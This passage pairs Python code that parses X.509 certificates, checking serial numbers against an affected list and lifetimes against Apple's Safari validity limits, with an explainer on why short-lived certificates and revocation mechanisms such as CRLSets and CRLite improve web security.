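def build_test_cert(serial: int, not_before: datetime, not_after: datetime) -> bytes:
    """Constructed, unsigned X.509 v3 skeleton used only as sample input."""
    alg = _tlv(0x30, _tlv(0x06, SHA256_RSA_OID))
    tbs = _tlv(0x30,
               _tlv(0xA0, _der_int(2)) + _der_int(serial) + alg
               + _tlv(0x30, b"")                                  # issuer Name
               + _tlv(0x30, _utctime(not_before) + _utctime(not_after))
               + _tlv(0x30, b"")                                  # subject Name
               + _tlv(0x30, alg + _tlv(0x03, b"\x00")))           # SPKI placeholder
    return _tlv(0x30, tbs + alg + _tlv(0x03, b"\x00"))


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                               # long length form
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def _parse_time(tag: int, body: bytes) -> datetime:
    s = body.decode()
    if tag == 0x17:                                # UTCTime: YYMMDDHHMMSSZ
        s = ("20" if int(s[:2]) < 50 else "19") + s
    return datetime.strptime(s, "%Y%m%d%H%M%SZ")   # GeneralizedTime shape


def cert_serial_and_validity(der: bytes) -> Tuple[int, datetime, datetime]:
    """Certificate -> tbsCertificate -> [version] serial sigAlg issuer validity."""
    _, cert, _ = _read_tlv(der, 0)
    _, tbs, _ = _read_tlv(cert, 0)
    tag, body, pos = _read_tlv(tbs, 0)
    if tag == 0xA0:                                # optional [0] EXPLICIT version
        tag, body, pos = _read_tlv(tbs, pos)
    if tag != 0x02:
        raise ValueError("serialNumber INTEGER expected")
    serial = int.from_bytes(body, "big")
    _, _, pos = _read_tlv(tbs, pos)                # signature AlgorithmIdentifier
    _, _, pos = _read_tlv(tbs, pos)                # issuer
    _, validity, _ = _read_tlv(tbs, pos)
    t1, nb, p = _read_tlv(validity, 0)
    t2, na, _ = _read_tlv(validity, p)
    return serial, _parse_time(t1, nb), _parse_time(t2, na)


def normalize_serial(s: str) -> str:
    """Accept 'serial=03:AB', '03ab' or '0x3ab' forms; compare as lowercase hex."""
    s = s.strip().lower().split("=")[-1].replace(":", "")
    s = s[2:] if s.startswith("0x") else s
    return s.lstrip("0") or "0"


def needs_replacement(der: bytes, affected_serials: Iterable[str]) -> bool:
    """True if the certificate's serial appears in the affected list."""
    serial, _, _ = cert_serial_and_validity(der)
    return normalize_serial(format(serial, "x")) in {normalize_serial(x) for x in affected_serials}


APPLE_CUTOFF = datetime(2020, 9, 1)   # simplified rendering of the policy in the text


def accepted_by_safari(der: bytes) -> bool:
    """Issued on/after the cutoff: at most 398 days; earlier: at most 825 days."""
    _, nb, na = cert_serial_and_validity(der)
    return (na - nb) <= timedelta(days=398 if nb >= APPLE_CUTOFF else 825)


# Constructed samples (not real serials, not the real affected list).
SAMPLE_90_DAY = build_test_cert(0x03AB, datetime(2020, 3, 1), datetime(2020, 3, 1) + timedelta(days=90))
SAMPLE_TWO_YEAR = build_test_cert(0x0102, datetime(2020, 10, 1), datetime(2022, 10, 1))
SAMPLE_OLD_TWO_YEAR = build_test_cert(0x07, datetime(2019, 10, 1), datetime(2021, 10, 1))
AFFECTED_LIST = ["03AB", "0000ff"]
```

The `normalize_serial` step matters in practice: `openssl x509 -noout -serial` prints `serial=` followed by uppercase hex, while published lists may use lowercase or colon-separated forms, and a naive string comparison would miss a match on formatting alone. Against real certificates the same walk applies, since `_read_tlv` handles long-form lengths; only the encoder is a stand-in for a certificate file.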

How Do Short-Lived Certificates Increase Security?

Capping certificate lifetimes improves website security, not least because it reduces the possibility of criminals stealing neglected certificates to mount phishing and malware attacks.
Secondly, mobile versions of Chrome and Firefox do not proactively check certificate status, meaning a website whose certificate has been revoked will continue to load without any warning to the user.
This is for performance reasons: browsers would otherwise have to download certificate revocation lists (CRLs), which can be quite large and slow down page loads.
Instead, Chrome uses CRLSets to “block certificates in emergency situations,” while Mozilla has been experimenting with CRLite in its nightly builds.
Aside from these techniques, the Firefox maker has also announced technical specifications for a new cryptographic protocol called “Delegated Credentials for TLS,” which “allows companies to take partial control over the process of signing new certificates for themselves—with a validity period of no longer than 7 days and without entirely relying on the certificate authority.”
It goes without saying that Apple’s decision to cut certificate lifetimes is a significant step forward for security. And if it helps proactively prevent users from connecting to compromised websites, it can only be a good thing.
